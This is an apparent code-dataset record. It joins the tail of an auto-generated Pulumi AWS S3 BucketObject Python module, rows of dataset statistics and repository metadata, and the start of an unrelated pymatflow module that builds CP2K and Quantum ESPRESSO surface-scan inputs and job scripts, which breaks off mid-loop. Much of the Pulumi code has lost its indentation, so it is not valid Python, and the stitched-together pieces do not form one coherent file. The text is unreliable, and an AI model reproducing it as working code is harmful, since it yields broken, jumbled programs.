acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_base64: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_language: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,
object_lock_mode: Optional[pulumi.Input[str]] = None,
object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,
storage_class: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version_id: Optional[pulumi.Input[str]] = None,
website_redirect: Optional[pulumi.Input[str]] = None) -> 'BucketObject':
"""
Get an existing BucketObject resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] acl: The [canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Defaults to "private".
:param pulumi.Input[str] bucket: The name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.
:param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.
:param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.
:param pulumi.Input[str] content_language: The language the content is in e.g. en-US or en-GB.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
:param pulumi.Input[str] etag: Used to trigger updates. The only meaningful value is `${filemd5("path/to/file")}` (this provider 0.11.12 or later) or `${md5(file("path/to/file"))}` (this provider 0.11.11 or earlier).
This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = "aws:kms"`.
:param pulumi.Input[bool] force_destroy: Allow the object to be deleted by removing any legal hold on any object version.
Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] kms_key_id: Specifies the AWS KMS Key ARN to use for object encryption.
This value is a fully qualified **ARN** of the KMS Key. If using `kms.Key`,
use the exported `arn` attribute:
`kms_key_id = "${aws_kms_key.foo.arn}"`
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: A map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).
:param pulumi.Input[str] object_lock_legal_hold_status: The [legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.
:param pulumi.Input[str] object_lock_mode: The object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.
:param pulumi.Input[str] object_lock_retain_until_date: The date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in S3. Valid values are "`AES256`" and "`aws:kms`".
:param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: The path to a file that will be read and uploaded as raw bytes for the object content.
:param pulumi.Input[str] storage_class: Specifies the desired [Storage Class](http://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html)
for the object. Can be either "`STANDARD`", "`REDUCED_REDUNDANCY`", "`ONEZONE_IA`", "`INTELLIGENT_TIERING`", "`GLACIER`", "`DEEP_ARCHIVE`", or "`STANDARD_IA`". Defaults to "`STANDARD`".
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the object.
:param pulumi.Input[str] version_id: A unique version ID value for the object, if bucket versioning
is enabled.
:param pulumi.Input[str] website_redirect: Specifies a target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["acl"] = acl
__props__["bucket"] = bucket
__props__["cache_control"] = cache_control
__props__["content"] = content
__props__["content_base64"] = content_base64
__props__["content_disposition"] = content_disposition
__props__["content_encoding"] = content_encoding
__props__["content_language"] = content_language
__props__["content_type"] = content_type
__props__["etag"] = etag
__props__["force_destroy"] = force_destroy
__props__["key"] = key
__props__["kms_key_id"] = kms_key_id
__props__["metadata"] = metadata
__props__["object_lock_legal_hold_status"] = object_lock_legal_hold_status
__props__["object_lock_mode"] = object_lock_mode
__props__["object_lock_retain_until_date"] = object_lock_retain_until_date
__props__["server_side_encryption"] = server_side_encryption
__props__["source"] = source
__props__["storage_class"] = storage_class
__props__["tags"] = tags
__props__["version_id"] = version_id
__props__["website_redirect"] = website_redirect
return BucketObject(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def acl(self) -> pulumi.Output[Optional[str]]:
        """
        The [canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Defaults to "private".
        """
        return pulumi.get(self, "acl")
    @property
    @pulumi.getter
    def bucket(self) -> pulumi.Output[str]:
        """
        The name of the bucket holding the object. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.
        """
        return pulumi.get(self, "bucket")
    @property
    @pulumi.getter(name="cacheControl")
    def cache_control(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies caching behavior along the request/reply chain. Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.
        """
        return pulumi.get(self, "cache_control")
    @property
    @pulumi.getter
    def content(self) -> pulumi.Output[Optional[str]]:
        """
        Literal string value used as the object content, uploaded as UTF-8-encoded text.
        """
        return pulumi.get(self, "content")
    @property
    @pulumi.getter(name="contentBase64")
    def content_base64(self) -> pulumi.Output[Optional[str]]:
        """
        Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.
        """
        return pulumi.get(self, "content_base64")
    @property
    @pulumi.getter(name="contentDisposition")
    def content_disposition(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.
        """
        return pulumi.get(self, "content_disposition")
    @property
    @pulumi.getter(name="contentEncoding")
    def content_encoding(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.
        """
        return pulumi.get(self, "content_encoding")
    @property
    @pulumi.getter(name="contentLanguage")
    def content_language(self) -> pulumi.Output[Optional[str]]:
        """
        The language the content is in, e.g. en-US or en-GB.
        """
        return pulumi.get(self, "content_language")
    @property
    @pulumi.getter(name="contentType")
    def content_type(self) -> pulumi.Output[str]:
        """
        A standard MIME type describing the format of the object data, e.g. application/octet-stream. All valid MIME types are valid for this input.
        """
        return pulumi.get(self, "content_type")
    @property
    @pulumi.getter
    def etag(self) -> pulumi.Output[str]:
        """
        Used to trigger updates. The only meaningful value is `${filemd5("path/to/file")}` (this provider 0.11.12 or later) or `${md5(file("path/to/file"))}` (this provider 0.11.11 or earlier).
        This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = "aws:kms"`.
        """
        return pulumi.get(self, "etag")
    @property
    @pulumi.getter(name="forceDestroy")
    def force_destroy(self) -> pulumi.Output[Optional[bool]]:
        """
        Allow the object to be deleted by removing any legal hold on any object version.
        Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.
        """
        return pulumi.get(self, "force_destroy")
    @property
    @pulumi.getter
    def key(self) -> pulumi.Output[str]:
        """
        The name of the object once it is in the bucket.
        """
        return pulumi.get(self, "key")
    @property
    @pulumi.getter(name="kmsKeyId")
    def kms_key_id(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies the AWS KMS Key ARN to use for object encryption.
        This value is a fully qualified **ARN** of the KMS Key. If using `kms.Key`,
        use the exported `arn` attribute:
        `kms_key_id = "${aws_kms_key.foo.arn}"`
        """
        return pulumi.get(self, "kms_key_id")
    @property
    @pulumi.getter
    def metadata(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase labels are currently supported by the AWS Go API).
        """
        return pulumi.get(self, "metadata")
    @property
    @pulumi.getter(name="objectLockLegalHoldStatus")
    def object_lock_legal_hold_status(self) -> pulumi.Output[Optional[str]]:
        """
        The [legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.
        """
        return pulumi.get(self, "object_lock_legal_hold_status")
    @property
    @pulumi.getter(name="objectLockMode")
    def object_lock_mode(self) -> pulumi.Output[Optional[str]]:
        """
        The object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.
        """
        return pulumi.get(self, "object_lock_mode")
    @property
    @pulumi.getter(name="objectLockRetainUntilDate")
    def object_lock_retain_until_date(self) -> pulumi.Output[Optional[str]]:
        """
        The date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).
        """
        return pulumi.get(self, "object_lock_retain_until_date")
    @property
    @pulumi.getter(name="serverSideEncryption")
    def server_side_encryption(self) -> pulumi.Output[str]:
        """
        Specifies server-side encryption of the object in S3. Valid values are "`AES256`" and "`aws:kms`".
        """
        return pulumi.get(self, "server_side_encryption")
    @property
    @pulumi.getter
    def source(self) -> pulumi.Output[Optional[Union[pulumi.Asset, pulumi.Archive]]]:
        """
        The path to a file that will be read and uploaded as raw bytes for the object content.
        """
        return pulumi.get(self, "source")
    @property
    @pulumi.getter(name="storageClass")
    def storage_class(self) -> pulumi.Output[str]:
        """
        Specifies the desired [Storage Class](http://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html)
        for the object. Can be either "`STANDARD`", "`REDUCED_REDUNDANCY`", "`ONEZONE_IA`", "`INTELLIGENT_TIERING`", "`GLACIER`", "`DEEP_ARCHIVE`", or "`STANDARD_IA`". Defaults to "`STANDARD`".
        """
        return pulumi.get(self, "storage_class")
    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        A map of tags assigned to the object.
        """
        return pulumi.get(self, "tags")
    @property
    @pulumi.getter(name="versionId")
    def version_id(self) -> pulumi.Output[str]:
        """
        A unique version ID value for the object, if bucket versioning
        is enabled.
        """
        return pulumi.get(self, "version_id")
    @property
    @pulumi.getter(name="websiteRedirect")
    def website_redirect(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies a target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).
        """
        return pulumi.get(self, "website_redirect")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 60.438923
| 378
| 0.672479
| 3,792
| 29,192
| 5.016878
| 0.09942
| 0.057822
| 0.061817
| 0.038793
| 0.828164
| 0.792893
| 0.769291
| 0.769291
| 0.760986
| 0.757622
| 0
| 0.014032
| 0.218793
| 29,192
| 482
| 379
| 60.564315
| 0.820171
| 0.549945
| 0
| 0.334783
| 1
| 0
| 0.124404
| 0.027934
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117391
| false
| 0.004348
| 0.021739
| 0.008696
| 0.256522
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4c60e75a2984de6910059a8ca8fa8e33aa6f067
| 50,974
|
py
|
Python
|
pymatflow/flow/surface_pes.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 6
|
2020-03-06T16:13:08.000Z
|
2022-03-09T07:53:34.000Z
|
pymatflow/flow/surface_pes.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 1
|
2021-10-02T02:23:08.000Z
|
2021-11-08T13:29:37.000Z
|
pymatflow/flow/surface_pes.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 1
|
2021-07-10T16:28:14.000Z
|
2021-07-10T16:28:14.000Z
|
"""
Overall manger for surface PES calculation
Prospects:
we might use a special scanning matter(moving atoms), like those used in AFM, and get the
image of the surface potential energy, which may help build the dataset for traning of the
surface recoginization and classification for microscopy picture and help use research on
the surface with image processing technique.
"""
import numpy as np
import sys
import os
import shutil
from pymatflow.remote.server import server_handle
import pymatflow.cp2k as cp2k
import pymatflow.qe as qe
import pymatflow.vasp as vasp
"""
"""
class cp2k_run(cp2k.opt_run):
    """
    Surface potential energy surface (PES) scan driven by CP2K.

    For every (deltax, deltay) grid point the selected "moving" atoms are
    displaced, a geometry-optimization input is generated in its own
    sub-directory (``_x_y_``), and job scripts (PBS and plain bash) are
    written that run the whole scan and post-process the results into a
    PES data file plus a gnuplot image.
    """
    def __init__(self):
        """Set up geometry optimization and install the default PES parameters."""
        super().__init__()
        self.set_geo_opt()
        self.pes_params = {}
        self.set_pes()  # set default value

    def set_pes(self, move_atom=None, xrange=None, yrange=None, zshift=0.0, fix_z=1, fix_y=2, fix_x=2):
        """
        Configure the PES scan.

        :param move_atom: 0-based indices of the atoms that will move in the
            calculation; defaults to [-1] (the last atom).
        :param xrange: [start, stop, step] x range for moving the specified
            moving atoms; defaults to [0, 1.5, 0.1].
        :param yrange: [start, stop, step] y range for moving the specified
            moving atoms; defaults to [0, 1.5, 0.5].
        :param zshift: z shift applied to the moving atoms at every grid point.
        :param fix_z: 0 -> do not fix z of any atom, 1 -> only fix z of the
            bottom atoms, 2 -> fix z of both the bottom and the moving atoms.
        :param fix_y: same convention as fix_z, for the y component.
        :param fix_x: same convention as fix_z, for the x component.
        """
        # Mutable defaults are materialized per call to avoid the shared
        # mutable-default-argument pitfall.
        self.pes_params["move_atom"] = [-1] if move_atom is None else move_atom
        self.pes_params["xrange"] = [0, 1.5, 0.1] if xrange is None else xrange
        self.pes_params["yrange"] = [0, 1.5, 0.5] if yrange is None else yrange
        self.pes_params["zshift"] = zshift
        self.pes_params["fix_z"] = fix_z
        self.pes_params["fix_y"] = fix_y
        self.pes_params["fix_x"] = fix_x

    def run(self, directory="tmp-cp2k-pes-opt", runopt="gen", auto=0):
        """
        Generate the scan inputs and job scripts, and optionally execute them.

        :param directory: working directory; removed and recreated on generation.
        :param runopt: "gen" (generate only), "run" (execute only) or "genrun" (both).
        :param auto: forwarded to server_handle to control job submission.
        """
        if runopt == "gen" or runopt == "genrun":
            if os.path.exists(directory):
                shutil.rmtree(directory)
            os.mkdir(directory)
            shutil.copyfile(self.force_eval.subsys.xyz.file, os.path.join(directory, os.path.basename(self.force_eval.subsys.xyz.file)))
            # use &COORD to input structure rather than &TOPOLOGY
            self.force_eval.subsys.coord.status = True
            self.force_eval.subsys.topology.status = False
            xrange = self.pes_params["xrange"]
            yrange = self.pes_params["yrange"]
            zshift = self.pes_params["zshift"]
            os.chdir(directory)
            # generate the input files and the initial trajectory
            os.system("mkdir -p post-processing")
            for deltay in np.arange(yrange[0], yrange[1], yrange[2]):
                for deltax in np.arange(xrange[0], xrange[1], xrange[2]):
                    self._gen_one_point(deltax, deltay, zshift)
            # write pbs job control script
            with open("pes-relax.pbs", 'w') as fout:
                fout.write("#!/bin/bash\n")
                fout.write("#PBS -N %s\n" % self.run_params["jobname"])
                fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
                fout.write("\n")
                fout.write("cd $PBS_O_WORKDIR\n")
                fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
                self._write_run_loop(fout, " mpirun -np $NP -machinefile $PBS_NODEFILE %s -in %s > %s\n" % ("$PMF_CP2K", "geo-opt.inp", "geo-opt.out"))
                self._write_post_processing(fout)
            # write local bash run script
            with open("pes-relax.sh", 'w') as fout:
                fout.write("#!/bin/bash\n")
                fout.write("\n")
                self._write_run_loop(fout, " %s %s -in %s | tee %s\n" % (self.run_params["mpi"], "$PMF_CP2K", "geo-opt.inp", "geo-opt.out"))
                self._write_post_processing(fout)
            os.chdir("../")
        if runopt == "genrun" or runopt == "run":
            os.chdir(directory)
            os.system("bash pes-relax.sh")
            os.chdir("../")  # fixed: was oschdir("../") -> NameError
        # server handle
        server_handle(auto=auto, directory=directory, jobfilebase="pes-relax", server=self.run_params["server"])

    def _gen_one_point(self, deltax, deltay, zshift):
        """Generate the geo-opt input and initial-trajectory frame for one (deltax, deltay) grid point."""
        # normalize -0.000 so directory and label names are stable
        x_label = deltax if np.abs(deltax) >= 0.001 else 0.0
        y_label = deltay if np.abs(deltay) >= 0.001 else 0.0
        os.mkdir("_%.3f_%.3f_" % (x_label, y_label))
        # displace the moving atoms for this grid point
        for i in self.pes_params["move_atom"]:
            self.force_eval.subsys.xyz.atoms[i].x += deltax
            self.force_eval.subsys.xyz.atoms[i].y += deltay
            self.force_eval.subsys.xyz.atoms[i].z += zshift
        # first fix xyz of all atoms, then selectively unfix components
        for atom in self.force_eval.subsys.xyz.atoms:
            atom.fix = [True, True, True]
        # axis index 0/1/2 <-> x/y/z; mode: 0 unfix everywhere, 1 unfix moving
        # atoms only, 2 keep everything fixed.
        # Fixed: the original fix_x == 1 branch read atoms[i].fix[0] without
        # assigning False, so x was never unfixed for the moving atoms.
        for axis, mode in ((2, self.pes_params["fix_z"]), (1, self.pes_params["fix_y"]), (0, self.pes_params["fix_x"])):
            if mode == 0:
                for atom in self.force_eval.subsys.xyz.atoms:
                    atom.fix[axis] = False
            elif mode == 1:
                for i in self.pes_params["move_atom"]:
                    self.force_eval.subsys.xyz.atoms[i].fix[axis] = False
            # mode == 2: nothing to do, component stays fixed
        with open("_%.3f_%.3f_/geo-opt.inp" % (x_label, y_label), 'w') as fout:
            self.glob.to_input(fout)
            self.force_eval.to_input(fout)
            self.motion.to_input(fout)
        with open("post-processing/trajectory-initial.xyz", 'a') as fout:
            # generate the xyz trajectory file -> (unrelaxed original traj)
            fout.write("%d\n" % self.force_eval.subsys.xyz.natom)
            fout.write("deltax: %.3f | deltay: %.3f\n" % (x_label, y_label))
            for atom in self.force_eval.subsys.xyz.atoms:
                fout.write("%s %.9f %.9f %.9f\n" % (atom.name, atom.x, atom.y, atom.z))
        # move the x y z back to the original values for the next grid point
        for i in self.pes_params["move_atom"]:
            self.force_eval.subsys.xyz.atoms[i].x -= deltax
            self.force_eval.subsys.xyz.atoms[i].y -= deltay
            self.force_eval.subsys.xyz.atoms[i].z -= zshift

    def _write_scan_loop_header(self, fout):
        """Emit the shell double loop over deltay/deltax, normalizing seq's -0.000 to 0.000."""
        xrange = self.pes_params["xrange"]
        yrange = self.pes_params["yrange"]
        fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
        fout.write("do\n")
        fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
        fout.write("do\n")
        fout.write(" if [ ${deltax} == -0.000 ]\n")
        fout.write(" then\n")
        fout.write(" deltax=0.000\n")
        fout.write(" fi\n")
        fout.write(" if [ ${deltay} == -0.000 ]\n")
        fout.write(" then\n")
        fout.write(" deltay=0.000\n")
        fout.write(" fi\n")

    def _write_run_loop(self, fout, run_line):
        """Emit the shell loop that enters each grid directory and runs the given command line."""
        self._write_scan_loop_header(fout)
        fout.write(" # run the calculation\n")
        fout.write(" cd _${deltax}_${deltay}_\n")
        fout.write(run_line)
        fout.write(" cd ../\n")
        fout.write("done\n")
        fout.write("done\n")

    def _write_post_processing(self, fout):
        """Emit shell code extracting relaxed structures, collecting the PES data and plotting it."""
        # code to extract the final structure for each combination of deltax and deltay
        fout.write("\n\n")
        fout.write("# code to extract final structure for each combination of deltax and deltay\n")
        fout.write("output_trajfile=./post-processing/trajectory-relaxed.xyz\n")
        fout.write("natom=%d\n" % self.force_eval.subsys.xyz.natom)
        self._write_scan_loop_header(fout)
        fout.write(" echo ${natom} >> ${output_trajfile}\n")
        fout.write(" cat >> ${output_trajfile}<<EOF\n")
        fout.write("deltax: ${deltax} | deltay: ${deltay}\n")
        fout.write("EOF\n")
        fout.write(" cat _${deltax}_${deltay}_/ab-initio-pos-1.xyz | tail -n -${natom} >> ${output_trajfile}\n")
        fout.write("done\n")
        fout.write("done\n")
        # result analysis: collect energies into pes.data
        fout.write("\n\n")
        fout.write("cat > post-processing/pes.data<<EOF\n")
        fout.write("# format: x y energy(Ry)\n")
        fout.write("EOF\n")
        fout.write("\n")
        self._write_scan_loop_header(fout)
        fout.write(" energy=`cat _${deltax}_${deltay}_/geo-opt.out | grep 'ENERGY| Total FORCE_EVAL ( QS ) energy (a.u.):' | tail -1`\n")
        fout.write(" cat >> post-processing/pes.data<<EOF\n")
        fout.write("${deltax} ${deltay} ${energy:32:-2}\n")
        fout.write("EOF\n")
        fout.write("done\n")
        fout.write("done\n")
        fout.write("\n")
        # gnuplot script; labels must be set BEFORE splot or they are ignored
        # (fixed: the bash-script variant previously emitted splot first).
        fout.write("cat > post-processing/plot.gnuplot<<EOF\n")
        fout.write("set term png\n")
        fout.write("set output 'pes.png'\n")
        fout.write("set xlabel 'x'\n")
        fout.write("set ylabel 'y'\n")
        fout.write("splot 'pes.data'\n")
        fout.write("EOF\n")
        fout.write("cd post-processing; gnuplot plot.gnuplot; cd ../\n")
class qe_run(qe.opt_run):
    """
    Calculate a surface potential energy surface (PES) via Quantum ESPRESSO.

    For every (deltax, deltay) grid point the selected "moving" atoms are
    displaced in the xy plane (optionally shifted in z), a relax input is
    generated in its own ``_<deltax>_<deltay>_`` directory, and job scripts
    (a PBS script and a plain bash script) are written that run the
    relaxations and then collect the relaxed trajectory and the PES data.
    """
    def __init__(self):
        """Initialize the underlying qe.opt_run and install default PES parameters."""
        super().__init__()
        self.pes_params = {}
        self.set_pes()  # set default values

    def set_pes(self, move_atom=None, xrange=None, yrange=None, zshift=0.0, fix_z=1, fix_y=2, fix_x=2):
        """
        :param move_atom: the atoms that will move in the calculation, list index starting from 0.
            Default: [-1] (the last atom).
        :param xrange: x range for moving the specified atoms, [start, end, step]. Default [0, 1.5, 0.1].
        :param yrange: y range for moving the specified atoms, [start, end, step]. Default [0, 1.5, 0.5].
        :param zshift: z shift for the moving atoms; shifts the z of the specified moving atoms by zshift.
        :param fix_z: 0 -> do not fix z of any atom, 1 -> only fix z of the bottom atoms,
            2 -> fix z of both the bottom and the moving atoms.
        :param fix_y: same convention as fix_z, for the y coordinate.
        :param fix_x: same convention as fix_z, for the x coordinate.
        """
        # None-sentinel defaults: avoids the shared-mutable-default-argument pitfall
        # (the previous list defaults were shared across all instances).
        self.pes_params["move_atom"] = [-1] if move_atom is None else move_atom
        self.pes_params["xrange"] = [0, 1.5, 0.1] if xrange is None else xrange
        self.pes_params["yrange"] = [0, 1.5, 0.5] if yrange is None else yrange
        self.pes_params["zshift"] = zshift
        self.pes_params["fix_z"] = fix_z
        self.pes_params["fix_y"] = fix_y
        self.pes_params["fix_x"] = fix_x

    @staticmethod
    def _write_xy_loop_open(fout, xrange, yrange):
        """Write the nested bash deltay/deltax `seq` loop headers plus the -0.000 -> 0.000 guards."""
        # do not add -w to seq
        fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
        fout.write("do\n")
        fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
        fout.write("do\n")
        fout.write(" if [ ${deltax} == -0.000 ]\n")
        fout.write(" then\n")
        fout.write(" deltax=0.000\n")
        fout.write(" fi\n")
        fout.write(" if [ ${deltay} == -0.000 ]\n")
        fout.write(" then\n")
        fout.write(" deltay=0.000\n")
        fout.write(" fi\n")

    def _write_post_sections(self, fout, xrange, yrange):
        """Append the relaxed-trajectory extraction, pes.data collection and gnuplot sections to a job script."""
        # extract the final structure for each combination of deltax and deltay
        fout.write("\n\n")
        fout.write("# code to extract final structure for each combination of deltax and deltay\n")
        fout.write("output_trajfile=./post-processing/trajectory-relaxed.xyz\n")
        fout.write("natom=%d\n" % self.arts.xyz.natom)
        self._write_xy_loop_open(fout, xrange, yrange)
        fout.write(" post-qe-relax.py -d _${deltax}_${deltay}_\n")
        fout.write(" echo ${natom} >> ${output_trajfile}\n")
        fout.write(" cat >> ${output_trajfile}<<EOF\n")
        fout.write("deltax: ${deltax} | deltay: ${deltay}\n")
        fout.write("EOF\n")
        fout.write(" cat _${deltax}_${deltay}_/post-processing/trajectory.xyz | tail -n -${natom} >> ${output_trajfile}\n")
        fout.write("done\n")
        fout.write("done\n")
        # collect the PES data points
        fout.write("\n\n")
        fout.write("cat > post-processing/pes.data<<EOF\n")
        fout.write("# format: x y energy(Ry)\n")
        fout.write("EOF\n")
        fout.write("\n")
        self._write_xy_loop_open(fout, xrange, yrange)
        fout.write(" energy=`cat _${deltax}_${deltay}_/relax.out | grep '! total energ' | tail -1`\n")
        fout.write(" cat >> post-processing/pes.data<<EOF\n")
        fout.write("${deltax} ${deltay} ${energy:32:-2}\n")
        fout.write("EOF\n")
        fout.write("done\n")
        fout.write("done\n")
        fout.write("\n")
        # gnuplot rendering of the collected PES
        fout.write("cat > post-processing/plot.gnuplot<<EOF\n")
        fout.write("set term png\n")
        fout.write("set output 'pes.png'\n")
        fout.write("splot 'pes.data'\n")
        fout.write("set xlabel 'x'\n")
        fout.write("set ylabel 'y'\n")
        fout.write("EOF\n")
        fout.write("cd post-processing; gnuplot plot.gnuplot; cd ../\n")

    def run(self, directory="tmp-qe-pes-opt", runopt="gen", auto=0):
        """
        Generate and/or run the PES relaxation grid.

        :param directory: working directory; recreated from scratch on "gen"/"genrun".
        :param runopt: "gen" (generate inputs/scripts only), "run" (run only), "genrun" (both).
        :param auto: forwarded to server_handle to control job submission.
        """
        if runopt == "gen" or runopt == "genrun":
            if os.path.exists(directory):
                shutil.rmtree(directory)
            os.mkdir(directory)
            shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
            # copy one UPF pseudopotential file per element into the working directory
            all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
            for element in self.arts.xyz.specie_labels:
                for upf in all_upfs:
                    if upf.split(".")[0] == element:
                        shutil.copyfile(upf, os.path.join(directory, upf))
                        break
            self.arts.pseudo.dir = os.path.abspath(directory)
            self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
            xrange = self.pes_params["xrange"]
            yrange = self.pes_params["yrange"]
            zshift = self.pes_params["zshift"]
            fix_z = self.pes_params["fix_z"]
            fix_y = self.pes_params["fix_y"]
            fix_x = self.pes_params["fix_x"]
            os.chdir(directory)
            # generate the input files and the initial trajectory
            os.system("mkdir -p post-processing")
            # iterate y first, then x, which is good for post-processing into an image
            for deltay in np.arange(yrange[0], yrange[1], yrange[2]):
                for deltax in np.arange(xrange[0], xrange[1], xrange[2]):
                    # avoid float -0.000 being rendered as the string "-0.000": use 0.0 when |value| < 0.001
                    os.mkdir("_%.3f_%.3f_" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0))
                    for i in self.pes_params["move_atom"]:
                        self.arts.xyz.atoms[i].x += deltax
                        self.arts.xyz.atoms[i].y += deltay
